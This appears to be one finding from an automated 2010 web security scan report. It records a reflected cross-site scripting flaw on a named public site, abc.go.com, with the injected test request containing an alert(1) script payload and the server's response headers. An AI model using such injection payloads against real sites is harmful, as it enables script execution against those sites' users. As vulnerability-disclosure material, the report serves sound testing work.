1. Cross-site scripting (reflected)
Severity: | High |
Confidence: | Certain |
Host: | http://abc.go.com |
Path: | /shows/castle |
GET /shows/castle?f01b9"%3balert(1)/ Host: abc.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;) Connection: close |
HTTP/1.1 200 OK Cache-Control: max-age=180 Date: Thu, 18 Nov 2010 13:13:10 GMT Content-Type: text/html; charset=UTF-8 Last-Modified: Thu, 18 Nov 2010 13:13:10 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: abc03 X-Powered-By: ASP.NET Set-Cookie: SWID=2D9C9511-DE6C-4AFE Cache-Expires: Thu, 18 Nov 2010 13:28:10 GMT Content-Length: 33374 Connection: close Vary: Accept-Encoding <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR ...[SNIP]... &itype=Footer&itype ...[SNIP]... |